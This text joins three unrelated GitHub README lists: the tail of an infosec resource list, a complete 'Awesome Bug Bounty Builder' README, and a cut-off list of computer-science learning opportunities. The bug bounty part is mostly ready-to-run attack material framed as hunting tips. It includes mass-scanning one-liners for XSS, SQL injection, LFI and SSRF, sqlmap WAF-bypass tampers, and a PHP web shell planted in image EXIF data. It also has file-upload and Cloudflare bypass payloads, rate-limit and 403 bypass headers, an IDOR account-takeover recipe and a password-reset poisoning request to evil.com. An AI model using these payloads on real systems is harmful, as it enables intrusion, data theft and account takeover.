2015](https://github.com/ctfs/write-ups-2015)<br> Wiki-like CTF write-ups repository, maintained by the community. (2015) - [CTF write-ups 2014](https://github.com/ctfs/write-ups-2014)<br> Wiki-like CTF write-ups repository, maintained by the community. (2014) - [CTF write-ups 2013](https://github.com/ctfs/write-ups-2013)<br> Wiki-like CTF write-ups repository, maintained by the community. (2013) ### CTF Repos - [captf](http://captf.com)<br> This site is primarily the work of psifertex since he needed a dump site for a variety of CTF material and since many other public sites documenting the art and sport of Hacking Capture the Flag events have come and gone over the years. - [shell-storm](http://shell-storm.org/repo/CTF)<br> The Jonathan Salwan's little corner. ### CTF Courses - [Hopper's Roppers CTF Course](https://hoppersroppers.github.io/courseCTF.html)<br> Free course designed to teach the fundamentals of Forensics, Cryptography, and Web-Exploitation required to be successful in Capture the Flag competitions. At the end of the course, students compete in the picoCTF event with guidance from instructors. SecurityTube Playlists ====================== Security Tube hosts a large range of video tutorials on IT security including penetration testing , exploit development and reverse engineering. * [SecurityTube Metasploit Framework Expert (SMFE)](http://www.securitytube.net/groups?operation=view&groupId=10)<br> This video series covers basics of Metasploit Framework. We will look at why to use metasploit then go on to how to exploit vulnerbilities with help of metasploit and post exploitation techniques with meterpreter. * [Wireless LAN Security and Penetration Testing Megaprimer](http://www.securitytube.net/groups?operation=view&groupId=9)<br> This video series will take you through a journey in wireless LAN (in)security and penetration testing. We will start from the very basics of how WLANs work, graduate to packet sniffing and injection attacks, move on to audit infrastructure vulnerabilities, learn to break into WLAN clients and finally look at advanced hybrid attacks involving wireless and applications. * [Exploit Research Megaprimer](http://www.securitytube.net/groups?operation=view&groupId=7)<br> In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find Zero Day vulnerabilities in both open and closed source software. * [Buffer Overflow Exploitation Megaprimer for Linux](http://www.securitytube.net/groups?operation=view&groupId=4)<br> In this video series, we will understand the basic of buffer overflows and understand how to exploit them on linux based systems. In later videos, we will also look at how to apply the same principles to Windows and other selected operating systems. Open Security Books =================== #### Crypto 101 - lvh Comes with everything you need to understand complete systems such as SSL/TLS: block ciphers, stream ciphers, hash functions, message authentication codes, public key encryption, key agreement protocols, and signature algorithms. Learn how to exploit common cryptographic flaws, armed with nothing but a little time and your favorite programming language. Forge administrator cookies, recover passwords, and even backdoor your own random number generator. - [Crypto101](https://www.crypto101.io/) - [LaTeX Source](https://github.com/crypto101/book) #### A Graduate Course in Applied Cryptography - Dan Boneh & Victor Shoup This book is about constructing practical cruptosystems for which we can argue security under plausible assumptions. The book covers many constructions for different tasks in cryptography. For each task we define the required goal. To analyze the constructions, we develop a unified framework for doing cryptographic proofs. A reader who masters this framework will capable of applying it to new constructions that may not be covered in this book. We describe common mistakes to avoid as well as attacks on real-world systems that illustratre the importance of rigor in cryptography. We end every chapter with a fund application that applies the ideas in the chapter in some unexpected way. - [A Graduate Course in Applied Cryptography](https://crypto.stanford.edu/~dabo/cryptobook/) #### Security Engineering, A Guide to Building Dependable Distributed Systems - Ross Anderson The world has changed radically since the first edition of this book was published in 2001. Spammers, virus writers, phishermen, money launderers, and spies now trade busily with each other in a lively online criminal economy and as they specialize, they get better. In this indispensable, fully updated guide, Ross Anderson reveals how to build systems that stay dependable whether faced with error or malice. Here?s straight talk on critical topics such as technical engineering basics, types of attack, specialized protection mechanisms, security psychology, policy, and more. - [Security Engineering, Second Edition](https://www.cl.cam.ac.uk/~rja14/book.html) #### Reverse Engineering for Beginners - Dennis Yurichev This book offers a primer on reverse-engineering, delving into disassembly code-level reverse engineering and explaining how to decipher assembly language for those beginners who would like to learn to understand x86 (which accounts for almost all executable software in the world) and ARM code created by C/C++ compilers. - [Reverse Engineering for Beginners](http://beginners.re/) - [LaTeX Source](https://github.com/dennis714/RE-for-beginners) #### CTF Field Guide - Trail of Bits The focus areas that CTF competitions tend to measure are vulnerability discovery, exploit creation, toolkit creation, and operational tradecraft.. Whether you want to succeed at CTF, or as a computer security professional, you'll need to become an expert in at least one of these disciplines. Ideally in all of them. - [CTF Field Guide](https://trailofbits.github.io/ctf/) - [Markdown Source](https://github.com/trailofbits/ctf) Challenges ========== - [Reverse Engineering Challenges](https://challenges.re/) - [Matasano Crypto Challenges](http://cryptopals.com/) Documentation ============= #### OWASP - Open Web Application Security Project The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. - [Open Web Application Security Project](https://www.owasp.org/index.php/Main_Page) #### Applied Crypto Hardening - bettercrypto.org This guide arose out of the need for system administrators to have an updated, solid, well re-searched and thought-through guide for configuring SSL, PGP,SSH and other cryptographic tools in the post-Snowdenage. Triggered by the NSA leaks in the summer of 2013, many system administrators and IT security officers saw the need to strengthen their encryption settings.This guide is specifically written for these system administrators. - [Applied Crypto Hardening](https://bettercrypto.org/static/applied-crypto-hardening.pdf) - [LaTeX Source](https://github.com/BetterCrypto/Applied-Crypto-Hardening) #### PTES - Penetration Testing Execution Standard The penetration testing execution standard cover everything related to a penetration test - from the initial communication and reasoning behind a pentest, through the intelligence gathering and threat modeling phases where testers are working behind the scenes in order to get a better understanding of the tested organization, through vulnerability research, exploitation and post exploitation, where the technical security expertise of the testers come to play and combine with the business understanding of the engagement, and finally to the reporting, which captures the entire process, in a manner that makes sense to the customer and provides the most value to it. - [Penetration Testing Execution Standard](http://www.pentest-standard.org/index.php/Main_Page) Related Awesome Lists ===================== - [Awesome Pentest](https://github.com/enaqx/awesome-pentest)<br> A collection of awesome penetration testing resources, tools and other shiny things. - [Awesome Appsec](https://github.com/paragonie/awesome-appsec)<br> A curated list of resources for learning about application security. - [Awesome Malware Analysis](https://github.com/rshipp/awesome-malware-analysis)<br> A curated list of awesome malware analysis tools and resources. - [Android Security Awesome](https://github.com/ashishb/android-security-awesome)<br> A collection of android security related resources. - [Awesome CTF](https://github.com/apsdehal/awesome-ctf)<br> A curated list of CTF frameworks, libraries, resources and softwares. - [Awesome Security](https://github.com/sbilly/awesome-security)<br> A collection of awesome software, libraries, documents, books, resources and cools stuffs about security. - [Awesome Honeypots](https://github.com/paralax/awesome-honeypots)<br> A curated list of awesome honeypots, tools, components and much more. - [Awesome Incident Response](https://github.com/meirwah/awesome-incident-response)<br> A curated list of tools and resources for security incident response, aimed to help security analysts and DFIR teams. - [Awesome Threat Intelligence](https://github.com/hslatman/awesome-threat-intelligence)<br> A curated list of awesome Threat Intelligence resources. - [Awesome PCAP Tools](https://github.com/caesar0301/awesome-pcaptools)<br> A collection of tools developed by other researchers in the Computer Science area to process network traces. - [Awesome Forensics](https://github.com/Cugu/awesome-forensics)<br> A curated list of awesome forensic analysis tools and resources. - [Awesome Hacking](https://github.com/carpedm20/awesome-hacking)<br> A curated list of awesome Hacking tutorials, tools and resources. - [Awesome Industrial Control System Security](https://github.com/hslatman/awesome-industrial-control-system-security)<br> A curated list of resources related to Industrial Control System (ICS) security. - [Awesome Web Hacking](https://github.com/infoslack/awesome-web-hacking)<br> This list is for anyone wishing to learn about web application security but do not have a starting point. - [Awesome Sec Talks](https://github.com/PaulSec/awesome-sec-talks)<br> A curated list of awesome Security talks. - [Awesome YARA](https://github.com/InQuest/awesome-yara)<br> A curated list of awesome YARA rules, tools, and people. - [Sec Lists](https://github.com/danielmiessler/SecLists)<br> SecLists is the security tester's companion. It is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more. [Contributing](https://github.com/onlurking/awesome-infosec/blob/master/contributing.md) ===================== Pull requests and issues with suggestions are welcome! License ======= [![Creative Commons License](http://i.creativecommons.org/l/by/4.0/88x31.png)](http://creativecommons.org/licenses/by/4.0/) This work is licensed under a [Creative Commons Attribution 4.0 International License](http://creativecommons.org/licenses/by/4.0/).
# Awesome Bug Bounty Builder ¯\\_(ツ)_/¯ <div align="center"> <img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"/> <br/> <a href="https://github.com/0xJin/awesome-bugbounty-builder/network"><img alt="GitHub forks" src="https://img.shields.io/github/forks/0xJin/awesome-bugbounty-builder"></a> <a href="https://github.com/0xJin/awesome-bugbounty-builder/blob/main/LICENSE"><img alt="GitHub license" src="https://img.shields.io/github/license/0xJin/awesome-bugbounty-builder"></a> <a href="https://github.com/0xJin/awesome-bugbounty-builder/stargazers"><img alt="GitHub stars" src="https://img.shields.io/github/stars/0xJin/awesome-bugbounty-builder"></a> <p><i> Awesome Bug bounty builder Project - ALL common Tools for find your Vulnerabilities.</i></p> </div> **Tested on Debian.** ![bb](https://user-images.githubusercontent.com/81621963/147457586-79ac41eb-f995-455b-a144-f80a5783047a.PNG) --- ## Installation: ```sh $ git clone https://github.com/0xJin/awesome-bugbounty-builder.git $ cd awesome-bugbounty-builder/ $ chmod +x awesome-bugbounty-build.sh $ ./awesome-bugbounty-builder.sh ``` ## Tools You will find here - Amass - Sublister - Gauplus - HTTPX - Gf + patterns - Kxss - Sqlmap - Commix - Tplmap - HYDRA - John the ripper - Evilwinrm - Arjun - Paramspider - NoSQLmap - NMAP - Nikto - FFUF - 403-Bypass - Gobuster - Seclists - Hash-identifier - XSSMAP - Smuggler - SSRFmap - Gmapsapiscanner - Qsreplace - exiftool - XSRFProbe - XXE Exploiter - Rustscan - LFISuite - Wapiti - Nuclei + template - URO - Freq - Subzy - OpenRedireX - GooFuzz - Fuxploider - CRLFUZZ - CENT - Liffy - SSRF-tool - Infoooze - Ghauri --- ## Bug Bounty TIPS and Usage of tools + One Liner TIPS : ### ONE-LINER *RECON* for FUZZ XSS : ```sh $ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt $ cat domain.txt | gauplus -random-agent -t 200 | gf xss | kxss | tee domain2.txt $ cat domain.txt | gauplus -random-agent -t 200 | gf xss | uro | qsreplace '"><img src=x onerror=prompt('jin');>' | freq ``` --- ### FUZZ all SUBDOMAINS with *FUFF* ONE-LINER : ```sh $ amass enum -brute -passive -d http://example.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist.txt -u @/FUZZ -mc 200' ``` --- ### COMMAND Injection with *FUFF* ONE-LINER : ```sh $ cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt $ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 // search for ”uid” in burp proxy intercept // You can use the same query for search SSTI in qsreplase add "{{7*7}}" and search on burp for '49' ``` --- ### SQL Injection Tips : ```sh // **MASS SQL injection** $ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt $ cat domain.txt | gauplus -random-agent -t 200 | gf sqli | tee domain2.txt $ sqlmap -m domain2.txt -dbs --batch --random-agent $ subfinder -dL domains.txt | dnsx | waybackurl | uro | grep "\?" | head -20 | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt // **SQL Injection headers** $ sqlmap -u "http://redacted.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10 // **SQL Injection bypass 401** $ sqlmap -u "http://redacted.com" --dbs --batch --random-agent --forms --ignore-code=401 // PRO TIPS FOR BYPASSING WAF, add to SQLmap this tamper --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned,space2comment,randomcase ``` --- ### XSS + SQLi + CSTI/SSTI ```sh Payload: '"><svg/onload=prompt(5);>{{7*7}} ``` --- ### EXIFTOOL + file UPLOAD Tips : ```sh $ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg // File Upload bypass file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php.\ file. file.php.... file.pHp5.... file.png.php file.png.pHp5 file.php%00.png file.php\x00.png file.php%0a.png file.php%0d%0a.png flile.phpJunk123png file.png.jpg.php file.php%00.png%00.jpg ``` --- ### Open Redirect Tips ONE-LINER : ```sh $ export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"' ``` --- ### LFI ONE-LINER : ```sh $ gauplus -random-agent -t 200 http://redacted.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' $ assetfinder -subs-only target.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60 $ cat domains.txt | gauplus -random-agent -t 10 | gf lfi | qsreplace ".%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" | httpx -silent -nc -mr "root:x:" -t 250 ``` --- ### Best SSRF Bypass : ```sh http://127.1/ http://0000::1:80/ http://[::]:80/ http://2130706433/ http://whitelisted@127.0.0.1 http://0x7f000001/ http://017700000001 http://0177.00.00.01 ``` ### Best SSRF Tips using this tool : ```sh $ amass enum -passive -brute -d yahoo.com -silent | httpx -silent | tee domains.txt | ssrf-tool -domains domains.txt -payloads payloads.txt -silent=false -paths=true -patterns patterns.txt $ echo "twitter.com" | gauplus -random-agent -t 100 | tee domains.txt; ssrftool -domains domains.txt -silent=false -paths=false -payloads payloads.txt ``` --- ### Email Attacks : ```sh // **Header Injection** "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com "recipient@test.com>\r\nRCPT TO:<victim+"@test.com // **XSS Injection** test+(<script>alert(0)</script>)@example.com test@example(<script>alert(0)</script>).com "<script>alert(0)</script>"@example.com // **SST Injection** "<%= 7 * 7 %>"@example.com test+(${{7*7}})@example.com // **SQL Injection** "' OR 1=1 -- '"@example.com "mail'); SLEEP(5);--"@example.com // **SSRF Attack** john.doe@abc123.burpcollaborator.net john.doe@[127.0.0.1] ``` --- ### XSS Payload for Image ```sh <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png ``` --- ### My XSS for bypass CLOUDFLARE with default rules ```sh "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> ``` --- ### Find hidden params in javascript files: ```sh $ amass enum -passive -brute -d redacted.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done ``` --- ### IDOR to Account TakeOver quickly : ```sh ~Create an account ~In the reset field set a password and intercept with burp ~GET /user/2099/reset (change to 2098) send the request ~Take the token ~Cookie editor and use this token ~Reload page ``` --- ### For API-KEYS : ```sh $ use gauplus and paramspider , after you can grep words like "api" or "key" and use gmapsapiscanner for see if is vulnerable. ``` ### Find sensitive information with GF tool : ```sh $ gauplus redacted.com -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee domains.txt sort -u domains.txt | fff -s 200 -o out/ $ for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done ``` --- ### Bypass RATE-LIMIT by adding : ```sh X-Originating-IP: IP X-Forwarded-For: IP X-Remote-IP: IP X-Remote-Addr: IP X-Client-IP: IP X-Host: IP X-Forwared-Host: IP ``` --- ### Find Access Token with FFUF and GAUPLUS : ```sh $ cat domains.txt | sed 's/https\?:\/\///' | gau > domains2.txt $ cat domains2.txt | grep -P "\w+\.js(\?|$)" | sort -u > jsurls.txt $ ffuf -mc 200 w jsurls.txt:HFUZZ -u HFUZZ -replay-proxy http://127.0.0.1:8080 // Use Scan Check Builder Burp extension, add passive profile to extract “accessToken” or “access_token” // Extract found tokens and validate with https://github.com/streaak/keyhacks ``` --- ### Find CORS vulnerabilities : ```sh $ amass enum -d redacted.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n3[0;32m[VUL TO CORS] 3[0m{}"' 2>/dev/null ``` --- ### Bypass 403 and 401 : ``` X-Original-URL: /admin X-Override-URL: /admin X-Rewrite-URL: /admin ``` --- ### Web Cache Deception : https://hackerone.com/reports/397508 --- ### Web Cache Poisoning : https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9 --- ### Password poisoning bypass to account takeover : ``` // Request POST https://target.com/password-reset?user=123 HTTP/1.1 Host: evil.com // If you receive a link this works! ``` --- ### Best Wordlists : ``` https://github.com/six2dez/OneListForAll/releases https://github.com/Karanxa/Bug-Bounty-Wordlists ``` --- ## Thanks <a href="https://www.buymeacoffee.com/0xJin" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-red.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a> Don't forget to follow me on Twitter. [@0xJin](https://twitter.com/0xJin) - This tool is made with ❤️ by 0xJin ¯\\_(ツ)_/¯.
# awesome-computer-science-opportunities An awesome list of events and fellowship opportunities for computer science students ## Contents - [Learning Platform](#learning-platform) - [Competitive Programming](#competitive-programming) - [Web Development](#web-development) - [Mobile Development](#mobile-development) - [DevOps](#devops) - [Data Science](#data-science) - [Artificial Intelligence](#artificial-intelligence) - [Computer Science](#computer-science) - [Open Source](#open-source) - [Infosec](#infosec) - [MOOCs](#moocs) - [Fellowships](#fellowshipsscholarships) - [Programming Events](#programming-events) - [Hackathons](#hackathons) - [General Opportunities](#general-opportunities) ## Learning Platform [Back to Top](#contents) ### Competitive Programming * [HackerRank](http://hackerrank.com) - Solve code challenges to prepare for programming interviews. * [HackerEarth](http://hackerearth.com) - Solve code challenges to help companies find innovative solutions for their businesses. * [CodeChef](http://codechef.com) - Non-profit competitive programming platform. * [TopCoder](http://topcoder.com) - Participate in code challenges and help solve real world problems. * [CodeForces](http://codeforces.com) - Russian website dedicated to competitive programming. * [ProjectEuler](http://projecteuler.net) - Solve computational and mathematical problems using your programming skills. * [Spoj](http://spoj.com) - Programming contests with online judging system. * [InterviewBit](https://www.interviewbit.com) - A platform to learn and practice coding interview questions. * [VisuAlgo](https://visualgo.net/en) - Visualizing data structures and algorithms through animation. * [LeetCode](https://leetcode.com) - Develop programming skills for your next interview. * [FireCode](https://www.firecode.io/) - An online coding interview preparation. * [CodeWars](https://www.codewars.com/) - Code challenges platform to level up your skills. * [CodinGame](https://www.codingame.com/) - Learn to code by playing games. * [CodeForces](http://codeforces.com/) - Online platform that hosts competitions and problem sets * [DailyProgrammer](https://www.reddit.com/r/dailyprogrammer/) - Solutions to programming challenges, peer reviewed with community feedback. * [CodeFights](https://codefights.com) - Practice programming and land a job. * [UVa](https://uva.onlinejudge.org) - Programming contests with online judging system. * [Stanford ACM ICPC](https://github.com/jaehyunp/stanfordacm) - Stanford [Notebook](https://github.com/jaehyunp/stanfordacm/blob/master/notebook.pdf) provides printable templates usable during online/on-site contests. * [Exercism](http://exercism.io/) - Solve programming challenges from your terminal. * [DailyCodingProblem](https://www.dailycodingproblem.com/) - Get exceptionally good at coding interviews by solving one problem every day. * [acmp.ru](http://acmp.ru) - Russian programming contests * [Timus Online Judge](http://acm.timus.ru/?locale=en) - Programming contests with online judging system. * [DMOJ: Modern Online Judge](https://dmoj.ca) - contest platform and archive of programming problems * [Rose Code](https://www.rosecode.net/) - Programming challenges with leaderboards and blog posts * [Coderbyte](https://coderbyte.com/) - Programming challenges and specific routes to help learn specific skills * [Code Golf](https://code-golf.io/) - Programming challenges with individual leaderboards for problems * [Daily Coding Problem](https://www.dailycodingproblem.com/) - Get emailed a new coding problem every day * [Halite](https://halite.io/) - Create AI to face off against other people's AI. More specialized on AI * [Advent of Code](https://adventofcode.com/) - A yearly set of coding challenges that published with leaderboards ### Web Development * [Learn Enough to Be Dangerous](https://www.learnenough.com/) - Free online coding tutorials on JavaScript, Ruby, Rails, CSS and more. * [FreeCodeCamp](http://freecodecamp.com) - Coding tutorials and challenges. * [Thimble](https://thimble.mozilla.org/en-US/) - Free online code editor, web server, web browser & developer tools. * [NodeSchool](https://nodeschool.io) - Open source workshops that teach web software skills. * [The Odin Project](https://www.theodinproject.com/) - A full free open source coding curriculum. * [Egghead](https://egghead.io/) - Video tutorials on popular JavaScript frameworks. * [Codecademy](https://www.codecademy.com/) - Free and premium interactive tutorials for various languages. * [CodeSchool](https://www.codeschool.com/) - Combination of video and interactive tutorials. * [MDN web docs](https://developer.mozilla.org/en-US/docs/Learn) - Web development articles by Mozilla. * [W3Schools](https://www.w3schools.com/) - Tutorials on HTML, CSS, JavaScript and more. * [Eloquent JavaScript](http://eloquentjavascript.net/) - An online book about JavaScript. * [Coder-Coder](https://www.coder-coder.com/) - Tutorials on Web Development from basics including HTML, CSS, JavaScript and more. * [CodeCraft](https://codecraft.tv/) - Provide Web Development Courses on JavaScript, AngularJS, Angular 5 for free. * [Scrimba](https://scrimba.com/) - Provides Web Development Courses with a unique feature of live interaction with the instructor's code. * [FrontendMasters](https://frontendmasters.com/) - In-depth and advanced video tutorials on Frontend Devlopment from experts in the industry. ### Mobile Development * [Udacity Android Nanodegree](https://in.udacity.com/course/android-developer-nanodegree-by-google--nd801) - Students can also apply for [scholarship](https://in.udacity.com/google-india-scholarships) given by Google. * [Android Developer Training](https://developers.google.com/training/android/) - Range of courses to help you build Android apps. * [Vogella](http://www.vogella.com/tutorials/android.html) - Tutorials about Android development. * [Android Hive](https://www.androidhive.info) - Android tutorials blog. * [iOS development](https://in.udacity.com/course/intro-to-ios-app-development-with-swift--ud585) - Build your first iOS app with an Udacity course. ### DevOps * [DevOps Bootcamp](http://devopsbootcamp.osuosl.org/start-here.html) - Course dedicated to teach core software development and systems operation skills. * [Google IT Support Course](https://www.coursera.org/specializations/google-it-support) - Google course to prepare you for a job in IT support. ### Data Science * [Kaggle](http://kaggle.com) - Data science competitive platform. * [DataQuest](http://dataquest.io) - Learn data science with your browser. * [DataCamp](http://datacamp.com) - Learn data science online. * [DrivenData](https://www.drivendata.org/) - Participate in data science competitions and help organizations. * [Analytics Vidhya](http://analyticsvidhya.com) - Training and Q&A platform based around data science. * [fast.ai](http://course.fast.ai/) - Deep Learning with only prerequisite being general coding skills. * [TunedIT](http://tunedit.org/data-competitions) - Data Mining competitions. * [Data Science Central](https://www.datasciencecentral.com/) - the online resource for big data practitioners. * [KPMG Data Science Virtual Internship](https://www.insidesherpa.com/virtual-internships/theme/m7W4GMqeT3bh9Nb2c/KPMG-Data-Analytics-Virtual-Internship) - learn data science from a Big 4 accounting firm and how it's used in industry. ### Artificial Intelligence * [Siraj Raval](https://www.youtube.com/channel/UCWN3xxRkmTPmbKwht9FuE5A) - YouTube channel with tutorials about AI. * [Sentdex](https://www.youtube.com/user/sentdex) - YouTube channel with programming tutorials. * [Two Minute Papers](https://www.youtube.com/user/keeroyz) - Learn AI with 5 mins videos. * [Andrej Karpathy](http://karpathy.github.io/) - Old blog about AI, now posting on [Medium](https://medium.com/@karpathy/). * [iamtrask](http://iamtrask.github.io/) - Machine Learning blog. * [colah's blog](http://colah.github.io/) - Blog about neural networks. * [Google Machine Learning Course](https://developers.google.com/machine-learning/crash-course) - A crash course of machine learning taught by Google Engineers * [Google AI](https://ai.google/education/)- Learn from ML experts at Google ### Computer Science * [BaseCS](https://medium.com/basecs) - Explains computer science basics in easy-to-digest articles. Also in [podcast](https://www.codenewbie.org/basecs) format. * [Tutorials Point](http://tutorialspoint.com) - tutorials for technologies like web, mobile and many more. * [Introduction to Computer Science - CS101](https://classroom.udacity.com/courses/cs101/) - introduction to computer science in python language. ### Open Source * [Up For Grabs](http://up-for-grabs.net/#/) - Start exploring open source projects and get involved in them. * [24 Pull Requests](https://24pullrequests.com) - Yearly initiative to encourage developers to send 24 pull requests during December. * [HacktoberFest](https://hacktoberfest.digitalocean.com) - Similar to 24PullRequests, gives swag for 4 accepted pull requests. * [OpenHatch](https://openhatch.org/search/) - Non-profit providing tools for new open source contributors. * [First Timers Only](http://www.firsttimersonly.com) - Beginners-friendly open source projects. * [Your First PR](http://yourfirstpr.github.io/) - Helps you make a contribution by showcasing great starter issues on Github. * [Awesome For Beginners](https://github.com/MunGell/awesome-for-beginners) - A list of awesome beginners-friendly projects. * [CodeTriage](https://www.codetriage.com/) - Pick your favorite projects to receive a different issue in your inbox every day. * [Open Source Friday](https://opensourcefriday.com/) - Helps you find a project to contribute to. ## Infosec __How to start? - blogs__ * [Beginner Bug Bounty Hunters resources](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters)- Collection of resources to build up the basics of Web Application Security * [Getting Started in Bug Bounty Hunting](https://whoami.securitybreached.org/2019/06/03/guide-getting-started-in-bug-bounty-hunting/) - What You Should Know Before Starting to learn about Bug Bounty Hunting? * [Getting started in Bug Bounty](https://medium.com/@ehsahil/getting-started-in-bug-bounty-7052da28445a) - How to get started in Bug Bounties * [How to get started with bug Bounty?](https://medium.com/@unknownuser1806/what-i-have-learn-in-my-first-month-of-hacking-and-bug-bounty-dc1a4be58294) - What you need to learn before getting started with bug bounty * [METHODOLOGY , TOOLKIT , TIPS & TRICKS](https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65) - A complete bug bounty blog for beginners __Recon__ * [Recon - by Sahil Ahamad](https://medium.com/@ehsahil/recon-my-way-82b7e5f62e21) - Blog post on reconnaissance processes for web applications security testing * [Recon - by Adrien](https://medium.com/bugbountywriteup/whats-tools-i-use-for-my-recon-during-bugbounty-ec25f7f12e6d) - What tools I use for my recon during Bug Bounty ## MOOCs [Back to Top](#contents) * [Udacity](http://udacity.com) - Free and paid online classes. * [Coursera](http://coursera.org) - Courses from schools and universities like Stanford and Yale. * [Udemy](http://udemy.com) - Online learning and teaching platform. * [edX](https://www.edx.org) - Free online courses from institutions like Harvard, MIT, Microsoft and more. * [Codecademy](https://www.codecademy.com/) - Online learning platform for coding. * [MIT OPENCOURSEWARE](https://ocw.mit.edu/courses/find-by-department/) - Browse and learn with free MIT courses' material. * [Microsoft Virtual Academy](https://mva.microsoft.com) - Free courses on IT basic concepts and Microsoft products and services. * [Awesome Courses](https://github.com/prakhar1989/awesome-courses) - List of awesome university courses for learning Computer Science. * [Lynda](https://www.lynda.com) - Online learning platform. * [Stanford Online](https://online.stanford.edu/courses) - Stanford's courses platform. * [Pluralsight](https://www.pluralsight.com/) - Paid learning platform made to help you build your career or land a job. * [Khan Academy](https://www.khanacademy.org/) - Free online learning platform. * [Sololearn](https://www.sololearn.com/) - Learn coding from the ground up for free!! (also available on android) * [Y Combinator](https://www.insidesherpa.com/virtual-internships/prototype/oRMogWRHeewqHzA7u/College-students%3A-Learn-how-to-work-at-a-YC-startup-) - Learn how engineering works at a Y Combinator startup * [MOOC.fi](https://www.mooc.fi/en) - Free courses from the University of Helsinki's Department of Computer Science. ## Fellowships/Scholarships [Back to Top](#contents) * [Developer Scholarship from Google](https://in.udacity.com/google-india-scholarships) - Link for Indian students (Others click [here](https://www.udacity.com/scholarships)). * [Scholarship Opportunities at Google](https://edu.google.com/scholarships/) - Google's scholarship opportunities. * [Microsoft Scholarship Program](https://careers.microsoft.com/students/scholarships) - For students at US/Canada/Mexico only. * [Fellowships at Microsoft Research Asia](https://www.microsoft.com/en-us/research/academic-program/fellowships-microsoft-research-asia/) - For students in mainland China, Hong Kong, Japan, Korea, Singapore, or Taiwan. * [IBM PhD Fellowship](https://www.research.ibm.com/university/awards/fellowships.html) - For students who want to make their mark in promising and disruptive technologies. * [Thiel Fellowship for young innovators](http://thielfellowship.org) - Intended for students under 23yo and offers a total of $100,000 and guidance to drop out of school and pursue other work. * [The Facebook Fellowship Program](https://research.fb.com/programs/fellowship/) - Designed to encourage promising doctoral students who are engaged in areas related to computer science. * [NVIDIA Graduate Fellowships](http://research.nvidia.com/graduate-fellowships) - Fellowship for AI,ML students. * [S.N. Bose Scholars Program](http://iusstf.org/story/53-74-For-Indian-Students.html) - For Indian Students. * [Richard E. Merwin Student Scholarship](https://www.computer.org/web/students/merwin) - For IEEE members. * [The Data Science for Social Good Fellowship](https://dssg.uchicago.edu) - It is a University of Chicago summer program to train aspiring data scientists to work on data mining, machine learning, big data, and data science projects with social impact. * [The Data Incubator](https://www.thedataincubator.com) - The Data Incubator is an 8-week educational fellowship preparing students with Master's degrees and PhDs for careers in big data and data science. * [Kleiner Perkins Fellow - Engineering](http://fellows.kleinerperkins.com) - Kleiner Perkins Fellows program matches accepted fellows up with their partnering Silicon Valley startups over the summer. * [Cern Openlab Summer Student Programme](https://openlab.cern/education) - CERN openlab is a 2 month long student program where students complete assigned projects with CERN members during the summer. * [HackNY Fellow](https://apply.hackny.org/) - Fellowship that matches students with New York City Startups * [Adobe India Women-in-Technology Scholarship](https://research.adobe.com/adobe-india-women-in-technology-scholarship/) - Adobe Scholarship for encouraging women to showcase their excellence in computing and technology. * [Grace Hopper Scholarship](https://www.gracehopper-gitusc.com/#!) - A Scholarship by USC Girls in Tech. * [WeTech Qualcomm Global Scholarship](https://www.iie.org/Programs/WeTech/STEM-Scholarships-for-Women/Qualcomm-Global-Scholars-Program) - A scholarship for women in technology by Qualcomm and IIE. * [Emeritus fellowship](https://www.ugc.ac.in/ef/) - For the superannuated teachers. * [Junior research fellowship in science, humanities and social science](https://www.ugc.ac.in/oldpdf/xplanpdf/JRFscience.pdf) - It is for qualifiers of UGC and UGC-CSIR tests. * [UGC research fellowships in science for meritorious 